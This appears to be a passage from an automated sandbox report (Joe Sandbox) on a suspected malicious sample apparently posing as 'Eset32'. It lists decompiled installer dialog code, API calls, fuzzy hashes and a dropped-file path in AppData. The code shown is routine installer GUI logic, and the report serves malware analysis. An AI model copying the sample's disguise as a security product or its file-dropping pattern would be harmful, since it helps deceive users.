                                                          0x00404d73
                                                          0x00404d9e
                                                          0x00404d75
                                                          0x00404d84
                                                          0x00404d84
                                                          0x00404d37
                                                          0x00404d3a
                                                          0x00404d48
                                                          0x00404d52
                                                          0x00404d5a
                                                          0x00404d61
                                                          0x00404d6c
                                                          0x00404d6c
                                                          0x00404d35
                                                          0x00404da4
                                                          0x00404da5
                                                          0x00404db1
                                                          0x00404db1
                                                          0x00404dbd
                                                          0x00404dd8
                                                          0x00404ddb
                                                          0x00404df8
                                                          0x00000000
                                                          0x00404ddd
                                                          0x00404de2
                                                          0x00404deb
                                                          0x0040517d
                                                          0x0040518f
                                                          0x0040518f
                                                          0x00404ddb
                                                          0x00000000
                                                          0x00404dbd
                                                          0x00404cf0

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                          • Opcode Fuzzy Hash: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                          0x00403cb0
                                                          0x00403cb9
                                                          0x00403dfa
                                                          0x00403dfe
                                                          0x00403e02
                                                          0x00403e04
                                                          0x00403e09
                                                          0x00403e14
                                                          0x00403e1f
                                                          0x00403e24
                                                          0x00403e26
                                                          0x00403e28
                                                          0x00403e2b
                                                          0x00403e30
                                                          0x00403e3e
                                                          0x00403e4b
                                                          0x00403e52
                                                          0x00403e52
                                                          0x00403e53
                                                          0x00403e53
                                                          0x00403e58
                                                          0x00403e5e
                                                          0x00403e65
                                                          0x00403e6b
                                                          0x00403e6d
                                                          0x00403ead
                                                          0x00403eb2
                                                          0x00403eb7
                                                          0x00403eb7
                                                          0x00403ebc
                                                          0x00403ec5
                                                          0x00403ec7
                                                          0x00403ecc
                                                          0x00403ed2
                                                          0x00403ed6
                                                          0x00403ed6
                                                          0x00403edb
                                                          0x00403ee1
                                                          0x00000000
                                                          0x00000000
                                                          0x00403eec
                                                          0x00403ef2
                                                          0x00000000
                                                          0x00000000
                                                          0x00403efb
                                                          0x00403f03
                                                          0x00403f08
                                                          0x00403f0b
                                                          0x00403f11
                                                          0x00403f16
                                                          0x00403f19
                                                          0x00403f1f
                                                          0x00403f24
                                                          0x00403f27
                                                          0x00403f2d
                                                          0x00403f35
                                                          0x00403f3b
                                                          0x00403f41
                                                          0x00403f45
                                                          0x00403f4c
                                                          0x00403f4c
                                                          0x00403f4c
                                                          0x00403f56
                                                          0x00403f68
                                                          0x00403f74
                                                          0x00403f79
                                                          0x00403f83
                                                          0x00403f89
                                                          0x00403f8b
                                                          0x00403f90
                                                          0x00403f8d
                                                          0x00403f8d
                                                          0x00403f8d
                                                          0x00403fa0
                                                          0x00403fb8
                                                          0x00403fba
                                                          0x00403fc0
                                                          0x00403fd5
                                                          0x00403fc2
                                                          0x00403fcb
                                                          0x00403fcd
                                                          0x00403fcd
                                                          0x00403fdb
                                                          0x00403fec
                                                          0x00403ffd
                                                          0x00404004
                                                          0x0040400a
                                                          0x0040400e
                                                          0x00404013
                                                          0x00404015
                                                          0x00000000
                                                          0x0040401b
                                                          0x0040401b
                                                          0x0040401d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404023
                                                          0x00404027
                                                          0x0040404c
                                                          0x00404052
                                                          0x00404058
                                                          0x0040405a
                                                          0x00000000
                                                          0x00000000
                                                          0x00404080
                                                          0x00404086
                                                          0x00404088
                                                          0x0040408d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404093
                                                          0x00404096
                                                          0x00404099
                                                          0x004040b0
                                                          0x004040bc
                                                          0x004040d5
                                                          0x004040db
                                                          0x004040df
                                                          0x004040e4
                                                          0x004040ea
                                                          0x00000000
                                                          0x00000000
                                                          0x004040f4
                                                          0x004040ff
                                                          0x00000000
                                                          0x004040ff
                                                          0x00404029
                                                          0x0040402f
                                                          0x00000000
                                                          0x00000000
                                                          0x00404035
                                                          0x0040403b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404041
                                                          0x00404015
                                                          0x0040410c
                                                          0x00404118
                                                          0x0040411f
                                                          0x00000000
                                                          0x00403e6f
                                                          0x00403e6f
                                                          0x00403e72
                                                          0x00403ea5
                                                          0x00403ea5
                                                          0x00403ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ea7
                                                          0x00403e74
                                                          0x00403e78
                                                          0x00403e7d
                                                          0x00403e7f
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e8f
                                                          0x00403e97
                                                          0x00000000
                                                          0x00403e9d
                                                          0x00403ccb
                                                          0x00403ccb
                                                          0x00403ccf
                                                          0x00403cd4
                                                          0x00403ce3
                                                          0x00403ce3
                                                          0x00403cec
                                                          0x00403cf5
                                                          0x00403d00
                                                          0x00403d00
                                                          0x00403d0c
                                                          0x00403d28
                                                          0x00403d2b
                                                          0x00403d3e
                                                          0x00403d44
                                                          0x00403de7
                                                          0x00000000
                                                          0x00403df0
                                                          0x00403d4a
                                                          0x00403d57
                                                          0x00403d59
                                                          0x00403d5b
                                                          0x00403d7a
                                                          0x00403d7a
                                                          0x00403d7d
                                                          0x00403d82
                                                          0x00403d85
                                                          0x00403d95
                                                          0x00403d96
                                                          0x00403d98
                                                          0x00403dce
                                                          0x00403de1
                                                          0x00000000
                                                          0x00403de1
                                                          0x00403d9a
                                                          0x00403da0
                                                          0x00403db9
                                                          0x00403dbe
                                                          0x00403dc0
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dc2
                                                          0x00403dae
                                                          0x00403dae
                                                          0x00403db0
                                                          0x00403db0
                                                          0x00000000
                                                          0x00403db0
                                                          0x00403da3
                                                          0x00403da8
                                                          0x00000000
                                                          0x00403da8
                                                          0x00403d87
                                                          0x00403d8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d8f
                                                          0x00000000
                                                          0x00403d8f
                                                          0x00403d7f
                                                          0x00000000
                                                          0x00403d7f
                                                          0x00403d65
                                                          0x00403d6c
                                                          0x00403d72
                                                          0x00403d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d74
                                                          0x00403d30
                                                          0x00000000
                                                          0x00403d0e
                                                          0x00403d14
                                                          0x00403d1e
                                                          0x00404125
                                                          0x0040412b
                                                          0x0040412d
                                                          0x00404133
                                                          0x00404138
                                                          0x0040413e
                                                          0x0040413e
                                                          0x00404133
                                                          0x00404148
                                                          0x00000000
                                                          0x00404148
                                                          0x00403d0c

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32 ref: 00403D30
                                                          • GetDlgItem.USER32 ref: 00403D51
                                                          • SendMessageA.USER32 ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32 ref: 00403E1A
                                                          • GetDlgItem.USER32 ref: 00403E24
                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                          • SendMessageA.USER32 ref: 00403E8F
                                                          • GetDlgItem.USER32 ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32 ref: 00403FA0
                                                          • SendMessageA.USER32 ref: 00403FB8
                                                          • SendMessageA.USER32 ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                          • Opcode Fuzzy Hash: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004042E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
								__eflags =  *0x42985c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3c0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E0040458A(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42985c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x42a068 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404566();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebfc; // 0x4ab049
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f478;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004042B1;
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E0040417B(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004041B0(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f434 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42985c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42985c = 0;
					return 0;
				}
			}



















                                                          0x004042f6
                                                          0x00404408
                                                          0x0040441b
                                                          0x00404477
                                                          0x00404477
                                                          0x0040447b
                                                          0x00404541
                                                          0x00404548
                                                          0x0040454a
                                                          0x0040454a
                                                          0x0040454a
                                                          0x00404550
                                                          0x00404550
                                                          0x00404553
                                                          0x00000000
                                                          0x0040455a
                                                          0x00404489
                                                          0x0040448b
                                                          0x0040448e
                                                          0x00404495
                                                          0x00404497
                                                          0x0040449e
                                                          0x004044a0
                                                          0x004044a3
                                                          0x004044a6
                                                          0x004044ab
                                                          0x004044b1
                                                          0x004044b4
                                                          0x004044bb
                                                          0x004044c9
                                                          0x004044e1
                                                          0x004044e3
                                                          0x004044eb
                                                          0x004044fa
                                                          0x004044fc
                                                          0x004044fc
                                                          0x004044bb
                                                          0x0040449e
                                                          0x004044ff
                                                          0x00404506
                                                          0x00000000
                                                          0x00404508
                                                          0x00404508
                                                          0x0040450f
                                                          0x00000000
                                                          0x00000000
                                                          0x00404511
                                                          0x00404515
                                                          0x00404526
                                                          0x00404526
                                                          0x00404528
                                                          0x0040452c
                                                          0x0040453a
                                                          0x0040453a
                                                          0x00000000
                                                          0x0040453e
                                                          0x00404506
                                                          0x00404423
                                                          0x00404426
                                                          0x00000000
                                                          0x00000000
                                                          0x0040442e
                                                          0x00404434
                                                          0x00000000
                                                          0x00000000
                                                          0x00404440
                                                          0x00404443
                                                          0x00404446
                                                          0x00000000
                                                          0x00000000
                                                          0x00404469
                                                          0x00404469
                                                          0x0040446b
                                                          0x0040446d
                                                          0x00404472
                                                          0x00000000
                                                          0x004042fc
                                                          0x004042fc
                                                          0x004042ff
                                                          0x00404304
                                                          0x00404306
                                                          0x00404315
                                                          0x00404315
                                                          0x0040431c
                                                          0x0040431f
                                                          0x00404321
                                                          0x00404326
                                                          0x0040432f
                                                          0x00404335
                                                          0x00404341
                                                          0x00404344
                                                          0x0040434d
                                                          0x00404352
                                                          0x00404355
                                                          0x0040435a
                                                          0x00404371
                                                          0x00404378
                                                          0x0040438b
                                                          0x0040438e
                                                          0x004043a3
                                                          0x004043aa
                                                          0x004043af
                                                          0x004043b4
                                                          0x004043b4
                                                          0x004043c3
                                                          0x004043d2
                                                          0x004043e4
                                                          0x004043e9
                                                          0x004043f9
                                                          0x004043fb
                                                          0x00000000
                                                          0x00404401

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe$N
                                                          • API String ID: 3103080414-4092545277
                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Name Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
